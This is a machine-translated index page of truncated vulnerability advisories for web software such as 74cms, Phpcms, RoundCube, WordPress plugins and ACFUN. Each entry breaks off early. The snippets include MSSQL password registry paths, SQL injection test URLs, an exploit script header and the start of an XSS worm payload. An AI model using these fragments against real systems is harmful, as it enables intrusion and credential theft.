Isn't it harsh? LFI + code injection

A simple statement to avoid misunderstanding of the meaning of this article: Fckeditor does not have any hard-hitting vulnerability in this article. It's just that the description of LFI can be used together with files like fckeditor that are not too

Navicat privilege escalation and mssql password location for the off-star host registry

The location of the mssql password in the external host registry: 1. HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 2. HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\ Navicat is a popular MySQL management tool, which

Server guard CMS (74cms) SQL injection vulnerability and repair

74cms SQL Injection Vulnerability: function getip() { if (getenv('HTTP_CLIENT_IP')) { $onlineip = getenv('HTTP_CLIENT_IP'); } else if (getenv('HTTP_X_FORWARDED_FOR')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } else if (getenv('remote _

MiaCMS v4.9.0 Multiple Remote File Inclusion Defects and repair

Title: MiaCMS v4.9.0 Multiple Remote File Inclusion Vulnerabilities Author: KedAns-Dz E-mail: ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com Platform: php Level: Remote File/Sh3lL compression

Phpcms v9 background (SQL inj) 2 (code exec) Vulnerability

Phpcms v9 background (SQL inj) 2 (code exec) Vulnerability. By flyh4t. In phpcms v9, the string2array() function uses the eval function, which may cause code execution vulnerabilities in multiple places. function string2array($data) { if

Pluck 4.7 multiple defects and repair

Title: Pluck 4.7 multiple vulnerabilities Author: Bl4k3 : http://www.pluck-cms.org/?file=download Test version: 4.7 1-File Inclusion: include(ALBUMS_DIR . '/' . $_GET['alipay'] . '.php'); Require: if (file_exists(ALBUMS_DIR . '

ET speech cross-site scripting vulnerability and repair

Author: mog. Brief description: Cross-site scripting (XSS) attacks exist in ET voice software. The account password can be obtained through simulated login. Detailed description: When a custom video is played in a channel, the webpage is

PHPKode Guestbook 1.0 Session hijacking defect and repair

PHPKode Guestbook 1.0 Session Hijacking Vulnerability. Author: bd0rk Contact: bd0rk [at] hackermail.com Greetz: Perle, Zubair Anjum, 1930-Team (Manu, Jenny, Manni & Conny) Test

Kuwebs 0-day and repair

error_reporting(E_ERROR); print_r('+ --------------------------------------------------------------------- + Kuwebs cms SQL injection exp Home: www.hkmjj.com + --------------------------------------------------------------------- +'); if

Feed on Feeds <= 0.5 remote code injection defects and repair

/* Feed on Feeds. Author: EgiX Mail: n0b0d13s [at] gmail [dot] com Software link...:

RoundCube 0.3.1 X-ray/SQL Injection defects and repair

Title: RoundCube 0.3.1 SQL injection Author: Smith Falcon : http://roundcube.net/download Version: 0.3.1 Test Platform: Linux. _timezone= is vulnerable to SQL Union Injection. "POST" data in http://www.bkjia.com/roundcube/index.

WP-SpamFree WordPress Spam plug-in SQL Injection defects and repair

Title: [WordPress wpsf-js plugin, SQL Injection] Author: [cheki] Affected Versions: [3.2.1] Test Platform: [linux] Tool: ["sqlmap"] # SQL Injection http://www.bkjia.com/wp-content/plugins/wp-spamfree/JavaScript/wpsf-js.php?id=1 Test: id=-1

Three-star business resort hotel website system injection + Upload Vulnerability and repair [asp + access]

Bt: 08 team Source code: http://down.admin5.com/asp/76153.html Multiple pages have the SQL injection vulnerability: Cps/clientnewsmore.asp news page. However, the database and the administrator database are separated. The database and administrator

Fims File Management System <= 1.2.1a multiple defects and repair

Title: fims-File Management System Author: Skraps (jackie.craig.sparks (at) live.com, jackie.craig.sparks (at) gmail.com, @skraps_foo) : http://fims.codeplex.com/ Affected Versions: 1.2.1a (tested) --------------- Proof of

Doldolphin <= 7.0.7 (member_menu_queries.php) remote code registration defect and repair

/* Doldolphin. Author: EgiX mail: n0b0d13s [at] gmail [dot] com Software connection:

WHMCompleteSolution (cart.php) local file leakage defects and repair

Title: WHMCompleteSolution (cart.php) Local File Disclosure Author: Lagripe-Dz Developer: WHMCS (WHMCompleteSolution) http://whmcs.com/ Affected Versions: 3.x.x, 4.0.x Test Platform: linux + apache Defect file: cart.php --------- Code

JqueryUpload large File Upload Arbitrary File Upload Vulnerability and repair

1. Directly access default.aspx after the directory is guessed (you may need to modify the uploadid parameter. You can see the specific packet capture, but undefined is not allowed) 2. Upload and test, capture packets 3. Modify the

Xss of localStorage on twitter

Author: nerd does not speak. Brief description: It's very funny, but I can give you an xss after using your computer. Detailed description: Know the id of the target user. Execute js in the current domain. localStorage.setItem("

11.3 cookie injection vulnerability in the website system of kangcheng logistics company and its repair

By Huaxia small E Source code Introduction: kangcheng logistics company website system, we carefully investigated the logistics industry website, integrated with the regular sections of the logistics industry, capacity display, logistics and

XSS + CSRF provides detailed analysis and Breakthrough measures for ACFUN users' persistent hijacking and self-propagation.

User center friend group location: X "x =" x There is a length check on the page, but it doesn't matter. packet capture structure: Name = addGroup & groupName = x "onmouseover =" var h = document. getElementsByTagName ('head') [0]; var s =
